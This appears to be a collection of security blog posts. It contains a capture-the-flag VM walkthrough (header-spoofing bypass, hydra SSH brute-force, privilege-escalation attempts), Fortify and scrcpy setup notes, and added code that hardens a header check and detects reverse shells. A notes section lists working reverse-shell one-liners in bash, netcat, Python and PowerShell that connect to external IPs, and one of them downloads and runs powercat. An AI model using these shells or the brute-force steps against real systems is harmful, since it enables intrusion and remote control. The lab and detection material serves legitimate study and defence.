Nmap scan report for bin4xin (192.168.3.60)
Host is up.
Nmap done: 256 IP addresses (12 hosts up) scanned in 5.35 seconds

The host whose MAC is labelled Oracle VirtualBox is the target: 192.168.3.59. Port scan first:

root@bin4xin:/usr/share/wordlist# nmap -A -O 192.168.3.59

Starting Nmap 7.60 ( https://nmap.org ) at 2020-01-08 10:08 UTC
Nmap scan report for 192.168.3.59
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:FD:9B:9B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.3.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds

The web part is an IP-restriction challenge; adding x-forwarded-for:localhost to the request headers bypasses it. Behind it is a login page, and the vulnerability is roughly an information exposure through a request parameter. The captured request for the user page is as follows:

localhost restriction

GET /?page=index HTTP/1.1
Host: 192.168.3.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
x-forwarded-for:localhost
Connection: close
Upgrade-Insecure-Requests: 1

Response: with the local-IP header added, the site's root page (with the login link) is returned normally:

HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 09:36:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Set-Cookie: PHPSESSID=72l97ppkrc8kgffl3n72dv37f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Ceban Corp</title>
    <style>
        .center {
            text-align: center;
        }
    </style>
</head>
<body>

    <div class="center">
        <h2>Welcome To Ceban Corp</h2>
        <p>Inspiring The People To Great Again!</p>
        <hr>
                <p><a href="?page=index">Home</a> | <a href="?page=login">Login</a> | 
                <a href="?page=register">Register</a> | <a href="?page=about">About</a></p>
                <hr>
    </div>

    
</body>
</html>
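The bypass above works because the application takes an access decision on a header the client controls. The following is an added example, not code from the original write-up: the target's own PHP check is not shown, so the vulnerable function is a hypothetical reconstruction of the behaviour described, placed beside a hardened version that only honours X-Forwarded-For when the TCP peer is one of the site's own reverse proxies (the proxy address 10.0.0.5 is a constructed value).

```python
# Added example, not code from the original write-up: the target's own PHP
# check is not shown, so is_local_vulnerable() is a hypothetical reconstruction
# of the behaviour described (any client can forge the header).
import ipaddress

# Constructed: the only reverse proxy that legitimately sets X-Forwarded-For.
TRUSTED_PROXIES = {"10.0.0.5"}


def is_local_vulnerable(headers, peer_ip):
    """Vulnerable: trusts a client-supplied header for an access decision."""
    xff = headers.get("x-forwarded-for", "").strip().lower()
    if xff in ("localhost", "127.0.0.1", "::1"):
        return True  # a forged "X-Forwarded-For: localhost" lands here
    return peer_ip in ("127.0.0.1", "::1")


def client_ip(headers, peer_ip, trusted=TRUSTED_PROXIES):
    """Hardened: the header counts only when the TCP peer is a trusted proxy.

    The chain is walked right to left (proxies append, clients can only
    prepend), skipping trusted hops; the first untrusted hop is the real
    client. Anything that is not an IP literal ("localhost") is ignored.
    """
    if peer_ip not in trusted:
        return peer_ip
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return peer_ip  # garbage in the header: fall back to the peer
        if hop not in trusted:
            return hop
    return peer_ip


def is_local_hardened(headers, peer_ip):
    """Loopback check on the resolved client address, not on the raw header."""
    return ipaddress.ip_address(client_ip(headers, peer_ip)).is_loopback


if __name__ == "__main__":
    forged = {"x-forwarded-for": "localhost"}
    print("vulnerable:", is_local_vulnerable(forged, "192.168.3.60"))  # True
    print("hardened:  ", is_local_hardened(forged, "192.168.3.60"))    # False
```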


Exploiting the vulnerability

After bypassing the IP restriction: register on the home page, log in, and modify the user_id parameter. The Burp Suite screenshot of the parameter is below:

Connecting to the target

Brute-forcing SSH with hydra: create user and pass files from the usernames and passwords leaked by the web app, then try hydra against the SSH service:

root@bin4xin:/home/bin4xin# cd /usr/share/wordlist/
root@bin4xin:/usr/share/wordlist# ls
root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist# vi user
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist# ls
user
root@bin4xin:/usr/share/wordlist# vi pass
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist# vi user
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist#

Run hydra -h to check the syntax for an SSH brute-force:

root@bin4xin:/usr/share/wordlist# hydra -h
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or 
for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] 
[-t TASKS] [-M FILE [-T TASKS]] [-w TIME] 
[-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: 
adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}
-form http-proxy http-proxy-urlenum 
icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5]
[s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2
rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp
[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Based on the syntax above, build the command; the run is as follows:

root@bin4xin:/usr/share/wordlist# hydra -L user -P pass ssh://192.168.3.59
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-01-08 09:56:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task
[DATA] attacking ssh://192.168.3.59:22/
[22][ssh] host: 192.168.3.59   login: alice   password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2020-01-08 09:56:35
root@bin4xin:/usr/share/wordlist#            

As shown, the SSH password was found: [22][ssh] host: 192.168.3.59 login: alice password: 4lic3
Connect directly over SSH:

C:\Users\本阿信>ssh 192.168.3.59 -l alice
Could not create directory 'C:\\Users\\\346\234\254\351\230\277\344\277\241/.ssh'.
The authenticity of host '192.168.3.59 (192.168.3.59)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (C:\\Users\\\346\234\254\351\230\277\344\277\241/.ssh/known_hosts).
alice@192.168.3.59's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)

Attempting privilege escalation

The box is not finished yet. After connecting over SSH I followed the usual routine and checked which directories the current user can write to, which turned up some interesting things, but with a lot going on lately I have not got root on the machine yet. To be updated.

alice@gfriEND:~$
alice@gfriEND:~$ find / -writable -type d 2>/dev/null
/home/alice
/home/alice/.cache
/home/alice/.my_secret
/run/user/1000
/run/shm
/run/lock
/tmp
/var/lib/php5
/var/crash
/var/tmp
/proc/1591/task/1591/fd
/proc/1591/fd
/proc/1591/map_files
/sys/fs/cgroup/systemd/user/1000.user/2.session
alice@gfriEND:~$ cd /home/alice/
alice@gfriEND:~$ cat .my_secret/
cat: .my_secret/: Is a directory
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls
flag1.txt  my_notes.txt
alice@gfriEND:~/.my_secret$ ls -la
total 16
drwxrwxr-x 2 alice alice 4096 Dec 13 14:10 .
drwxr-xr-x 4 alice alice 4096 Dec 13 14:47 ..
-rw-r--r-- 1 root  root   306 Dec 13 13:04 flag1.txt
-rw-rw-r-- 1 alice alice  119 Dec 13 12:23 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! 
I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

alice@gfriEND:~/.my_secret$ cat my_notes.txt
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, 
hopefully Bob doesn't know my notes

Trying various approaches:

alice@gfriEND:~/.my_secret$ cd ..
alice@gfriEND:~$ l
alice@gfriEND:~$ ls
alice@gfriEND:~$ cd ..
alice@gfriEND:/home$ ls
aingmaung  alice  eweuhtandingan  sundatea
alice@gfriEND:/home$ ls -la
total 24
drwxr-xr-x  6 root           root           4096 Dec 13 12:18 .
drwxr-xr-x 22 root           root           4096 Dec 13 10:21 ..
drwxr-xr-x  2 aingmaung      aingmaung      4096 Dec 13 12:18 aingmaung
drwxr-xr-x  4 alice          alice          4096 Dec 13 14:47 alice
drwxr-xr-x  2 eweuhtandingan eweuhtandingan 4096 Dec 13 12:18 eweuhtandingan
drwxr-xr-x  2 sundatea       sundatea       4096 Dec 13 12:18 sundatea
alice@gfriEND:/home$ cd /proc/1591/map_files
-bash: cd: /proc/1591/map_files: No such file or directory
alice@gfriEND:/home$ ls
aingmaung  alice  eweuhtandingan  sundatea
alice@gfriEND:/home$ cd /proc/1592/
alice@gfriEND:/proc/1592$ ls
ls: cannot read symbolic link cwd: Permission denied
ls: cannot read symbolic link root: Permission denied
ls: cannot read symbolic link exe: Permission denied
attr        comm             fd        map_files   net            pagemap      sessionid  status
autogroup   coredump_filter  fdinfo    maps        ns             personality  setgroups  syscall
auxv        cpuset           gid_map   mem         numa_maps      projid_map   smaps      task
cgroup      cwd              io        mountinfo   oom_adj        root         stack      timers
clear_refs  environ          limits    mounts      oom_score      sched        stat       uid_map
cmdline     exe              loginuid  mountstats  oom_score_adj  schedstat    statm      wchan
alice@gfriEND:/proc/1592$ cat map_files/
cat: map_files/: Permission denied
alice@gfriEND:/proc/1592$ ls -la
ls: cannot read symbolic link cwd: Permission denied
ls: cannot read symbolic link root: Permission denied
ls: cannot read symbolic link exe: Permission denied
total 0
dr-xr-xr-x   9 root root 0 Jan  8 17:01 .
dr-xr-xr-x 102 root root 0 Jan  8 16:29 ..
dr-xr-xr-x   2 root root 0 Jan  8 17:01 attr
-rw-r--r--   1 root root 0 Jan  8 17:01 autogroup
-r--------   1 root root 0 Jan  8 17:01 auxv
-r--r--r--   1 root root 0 Jan  8 17:01 cgroup
--w-------   1 root root 0 Jan  8 17:01 clear_refs
-r--r--r--   1 root root 0 Jan  8 17:01 cmdline
-rw-r--r--   1 root root 0 Jan  8 17:01 comm
-rw-r--r--   1 root root 0 Jan  8 17:01 coredump_filter
-r--r--r--   1 root root 0 Jan  8 17:01 cpuset
lrwxrwxrwx   1 root root 0 Jan  8 17:01 cwd
-r--------   1 root root 0 Jan  8 17:01 environ
lrwxrwxrwx   1 root root 0 Jan  8 17:01 exe
dr-x------   2 root root 0 Jan  8 17:01 fd
dr-x------   2 root root 0 Jan  8 17:01 fdinfo
-rw-r--r--   1 root root 0 Jan  8 17:01 gid_map
-r--------   1 root root 0 Jan  8 17:01 io
-r--r--r--   1 root root 0 Jan  8 17:01 limits
-rw-r--r--   1 root root 0 Jan  8 17:01 loginuid
dr-x------   2 root root 0 Jan  8 17:01 map_files
-r--r--r--   1 root root 0 Jan  8 17:01 maps
-rw-------   1 root root 0 Jan  8 17:01 mem
-r--r--r--   1 root root 0 Jan  8 17:01 mountinfo
-r--r--r--   1 root root 0 Jan  8 17:01 mounts
-r--------   1 root root 0 Jan  8 17:01 mountstats
dr-xr-xr-x   5 root root 0 Jan  8 17:01 net
dr-x--x--x   2 root root 0 Jan  8 17:01 ns
-r--r--r--   1 root root 0 Jan  8 17:01 numa_maps
-rw-r--r--   1 root root 0 Jan  8 17:01 oom_adj
-r--r--r--   1 root root 0 Jan  8 17:01 oom_score
-rw-r--r--   1 root root 0 Jan  8 17:01 oom_score_adj
-r--------   1 root root 0 Jan  8 17:01 pagemap
-r--------   1 root root 0 Jan  8 17:01 personality
-rw-r--r--   1 root root 0 Jan  8 17:01 projid_map
lrwxrwxrwx   1 root root 0 Jan  8 17:01 root
-rw-r--r--   1 root root 0 Jan  8 17:01 sched
-r--r--r--   1 root root 0 Jan  8 17:01 schedstat
-r--r--r--   1 root root 0 Jan  8 17:01 sessionid
-rw-r--r--   1 root root 0 Jan  8 17:01 setgroups
-r--r--r--   1 root root 0 Jan  8 17:01 smaps
-r--------   1 root root 0 Jan  8 17:01 stack
-r--r--r--   1 root root 0 Jan  8 17:01 stat
-r--r--r--   1 root root 0 Jan  8 17:01 statm
-r--r--r--   1 root root 0 Jan  8 17:01 status


  • I have recently been doing code-audit work and ran into a few problems, so I am jotting them down. Error description: when Fortify starts analysing Java code it reports No rules files found;

1. Error description

A round of Googling:

The problem

Original StackOverflow question:

 When I run a Fortify analysis against a Java project I receive this error :
 [warning]: No rules files found
 [error]: No rules files found
 Where can I configure the rules file ?

Original answer:

Navigate to the bin folder of your fortify installation
Enter scapostinstall
Enter 2 to select Settings
Enter 2 to select Proxy Server Host
Enter the name of the proxy server
Enter 3 to select Proxy Server Port.
Enter the proxy server's port number.
Exit and run fortifyupdate.cmd

The answer means that Fortify needs a proxy configured (a way past the firewall is required), after which the rule packs can be downloaded and set up.

2. Solving the problem

Proxy configuration

Go to the Fortify installation directory and configure the proxy; the session is as follows:

# change to the Fortify installation directory (Windows)
E:
cd fortify\bin\

E:\fortify\bin>scapostinstall
[1] Migration...
[2] Settings...
[s] Display all settings
[q] Exit
Please select the desired action (1,2,s,q): 2

[1] General...
[2] Fortify Update...
[3] Software Security Center Settings...
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,s,r,q): 2

[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): 2

Proxy Server Host [default: ]: localhost

[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): 3

Proxy Server Port [default: ]: 8080

[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): q

That completes the Fortify client proxy configuration; now run the update command to download the rule packs:

Updating the files

Run the fortifyupdate command; the output is as follows:

E:\fortify\bin>fortifyupdate.cmd
Using proxy server: localhost:8080
Storing Updated Security Content ...
E:\fortify\Core\config\rules
Fortify Secure Coding Rules, Core, Annotations v2015.2.0.0008
Fortify Secure Coding Rules, Extended, JSP v2015.2.0.0008
Fortify Secure Coding Rules, Core, Classic ASP, VBScript, and VB6 v2015.2.0.0008
Fortify Secure Coding Rules, Core, ActionScript 3.0 v2015.2.0.0008
Fortify Secure Coding Rules, Core, C/C++ v2015.2.0.0008
Fortify Secure Coding Rules, Extended, Java v2015.2.0.0008
Fortify Secure Coding Rules, Core, Android v2015.2.0.0008
Fortify Secure Coding Rules, Core, COBOL v2015.2.0.0008
Fortify Secure Coding Rules, Extended, C/C++ v2015.2.0.0008
Fortify Secure Coding Rules, Core, .NET v2015.2.0.0008
Fortify Secure Coding Rules, Core Preview, ABAP v2014.4.0.0008
Fortify Secure Coding Rules, Extended, Configuration v2015.2.0.0008
Fortify Secure Coding Rules, Extended, Content v2015.2.0.0008
Fortify Secure Coding Rules, Core, Objective-C v2015.2.0.0008
Fortify Secure Coding Rules, Core, PHP v2015.2.0.0008
Fortify Secure Coding Rules, Core, ABAP v2015.2.0.0008
Fortify Secure Coding Rules, Extended, SQL v2015.2.0.0008
Fortify Secure Coding Rules, Core, JavaScript v2015.2.0.0008
Fortify Secure Coding Rules, Core, SQL v2015.2.0.0008
Fortify Secure Coding Rules, Extended, .NET v2015.2.0.0008
Fortify Secure Coding Rules, Core, Java v2015.2.0.0008
Fortify Secure Coding Rules, Core, Ruby v2015.2.0.0008
Fortify Secure Coding Rules, Core, ColdFusion v2015.2.0.0008
Fortify Secure Coding Rules, Core, Python v2015.2.0.0008
Removing Old Metadata Files ...
E:\fortify\Core\config\ExternalMetadata
Main External List Mappings v2019.1.0.0007
Storing Updated Metadata Files ...
E:\fortify\Core\config\ExternalMetadata
Main External List Mappings v2015.2.0.0008

Result

Once configured, Fortify can happily be used for automated code scanning and analysis.

Respectfully submitted. Thank you for reading.

References:
Fortify Error: "No rules file found"


scrcpy: an excellent screen-mirroring tool on Linux

Dec 31, 2019. | By: Bin4xin

# apt install snapd
正在读取软件包列表... 完成
正在分析软件包的依赖关系树       
正在读取状态信息... 完成       
snapd 已经是最新版 (2.42.1-1)。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 26 个软件包未被升级
sudo snap install scrcpy.snap --dangerous

Since setting the http_proxy environment variable directly did not take effect, the author set the proxy in snapd itself, as follows:

# Preliminary: make systemctl edit use vim; skip this step if you do not mind nano
$ sudo tee -a /etc/profile <<-'EOF'
export SYSTEMD_EDITOR="/bin/vim"
EOF
$ source /etc/profile

# Set the proxy
$ sudo systemctl edit snapd
Add:
[Service]
Environment="http_proxy=http://127.0.0.1:port"
Environment="https_proxy=http://127.0.0.1:port"
$ sudo systemctl daemon-reload
$ sudo systemctl restart snapd

Tested; it works very well.

root@kali:/usr/local/scrcpy-test/scrcpy# sudo snap install scrcpy
2019-12-31T11:28:41+08:00 INFO Waiting for restart...
Download snap "core18" (1288) from channel "stable"             11% 14.7kB/s 57.7m^C^C^Z
[2]+  已停止               sudo snap install scrcpy

As shown above and below, the download is ten times faster. Ten times the joy.

root@kali:/usr/local/scrcpy-test/scrcpy# sudo snap install scrcpy
2019-12-31T11:36:30+08:00 INFO Waiting for restart...
Download snap "scrcpy" (199) from channel "stable"               7%  129kB/s 9m51s
Warning: /snap/bin was not found in your $PATH. If you've not restarted your session since you
         installed snapd, try doing that. Please see https://forum.snapcraft.io/t/9469 for more
         details.

scrcpy v1.12 from sisco311 installed

scrcpy needs USB debugging permission on the phone: enable [Developer options] - [USB debugging], otherwise it fails with:

root@kali:~# scrcpy
INFO: scrcpy 1.12 <https://github.com/Genymobile/scrcpy>
adb: error: failed to get feature set: no devices/emulators found
ERROR: "adb push" returned with value 1

Another error:

root@kali:/snap/bin# ./scrcpy
cannot change profile for the next exec call: No such file or directory
snap-update-ns failed with code 1: No such file or directory
Check the version:
root@kali:~# snap version
snap    2.42.5
snapd   2.42.5
series  16
kali    2019.4
kernel  5.3.0-kali3-amd64

Solution:

root@kali:/var/lib/snapd/apparmor/profiles# apparmor_parser -r /var/lib/snapd/apparmor/profiles/

References

snapInstall.md; workaround for slow snap installs

Snap-update-ns failing, cannot launch snaps; snap error when launching scrcpy after a Linux reboot


Notes: several ways to get a reverse shell

Dec 30, 2019. | By: Bin4xin

Notes on reverse bash shells :) quick jottings
Assumed environment:

  • kali, the victim machine; ip: 192.168.3.32. iZj6cgn7odv59wmjjhe6zwZ, the attacker machine; ip: 47.52.233.92

1.bash

root@kali:/# bash -i >&/dev/tcp/47.52.233.92/1234 0>& 1
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37798 received!
root@kali:/# whoami 
whoami
root
root@kali:/# ifconfig    
ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 1c:39:47:e5:d0:0d  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 132196  bytes 121378334 (115.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 132196  bytes 121378334 (115.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.32  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::c895:5ca5:529a:eef3  prefixlen 64  scopeid 0x20<link>
        ether 68:07:15:d5:46:16  txqueuelen 1000  (Ethernet)
        RX packets 140963  bytes 101469044 (96.7 MiB)
        RX errors 0  dropped 15  overruns 0  frame 0
        TX packets 86373  bytes 16895892 (16.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

2.netcat

root@kali:/# nc -e /bin/sh 47.52.233.92 1234
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37812 received!
python -c 'import pty;pty.spawn("/bin/sh")'
# whoami
whoami
root
# 

3.python

root@kali:/# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.52.233.92",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37820 received!
# whoami
root
# id
uid=0(root) gid=0(root) =0(root)

4. PowerShell reverse shell built from a TCPClient constructor

This worked in a real reverse-shell scenario; use case: 1. Windows systems 2. a webshell has been uploaded but there is no interactive shell

powershell.exe -nop -c "$client = New-Object Net.Sockets.TCPClient('117.64.238.192',11223);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 47.52.233.92 -p 11223 -e cmd

Meterpreter can enable remote desktop directly:

run getgui -e

Then rdesktop can connect directly.
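From the defender's side, every one of the one-liners above leaves a distinctive command line in process-creation telemetry. The following is an added example, not part of the original notes: signature matching for those four techniques (plus the pty upgrade and powercat variants shown), run over constructed process-start records of the form "pid user cmdline" such as auditd execve logging or an EDR would produce.

```python
# Added example, not part of the original notes: detection logic for the
# reverse-shell one-liners above, run over constructed process-start records
# of the form "pid user cmdline" (what auditd execve or an EDR would log).
import re

# (technique from the notes, regex for its tell-tale command-line fragment)
SIGNATURES = [
    ("bash /dev/tcp", re.compile(r"/dev/(?:tcp|udp)/[\w.:-]+/\d+")),
    ("netcat -e", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[A-Za-z]*e\s*/bin/(?:ba)?sh")),
    ("python socket+dup2", re.compile(r"python[23]?\b.*socket\.socket\(.*os\.dup2\(")),
    ("pty upgrade", re.compile(r"pty\.spawn\(")),
    ("powershell TCPClient", re.compile(r"Net\.Sockets\.TCPClient\(", re.I)),
    ("powercat", re.compile(r"\bpowercat\b.*\s-e\s", re.I)),
]


def classify(cmdline):
    """Names of every signature the command line triggers (empty if benign)."""
    return [name for name, pattern in SIGNATURES if pattern.search(cmdline)]


def scan(records):
    """Return (pid, user, hits) for each record that trips at least one signature."""
    alerts = []
    for record in records:
        pid, user, cmdline = record.split(" ", 2)
        hits = classify(cmdline)
        if hits:
            alerts.append((int(pid), user, hits))
    return alerts


# Constructed sample records modelled on the one-liners in the notes;
# the last two are benign (a plain listener and a dev server).
SAMPLE_LOG = [
    "1201 www-data bash -i >&/dev/tcp/47.52.233.92/1234 0>&1",
    "1202 www-data nc -e /bin/sh 47.52.233.92 1234",
    "1203 www-data python -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"47.52.233.92\",1234));os.dup2(s.fileno(),0);"
    "p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "1204 alice python -c 'import pty;pty.spawn(\"/bin/sh\")'",
    "1205 SYSTEM powershell.exe -nop -c \"$client = New-Object "
    "Net.Sockets.TCPClient('117.64.238.192',11223);\"",
    "1206 alice nc -lvvp 1234",
    "1207 alice python3 manage.py runserver",
]

if __name__ == "__main__":
    for pid, user, hits in scan(SAMPLE_LOG):
        print(f"ALERT pid={pid} user={user} {', '.join(hits)}")
```

The pattern for nc deliberately requires a shell argument, so a bare listener like the attacker-side `nc -lvvp 1234` does not alert.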


Android pentesting: hooking and Frida principles explained

Dec 26, 2019. | By: Bin4xin

Hooking explained

Hook technology refers to cross-process operations on Android, including: 1. native-layer hooks, i.e. JNI (Java Native Interface) calls, known as native hooks; 2. the Java native interface; 3. Java-layer hooks

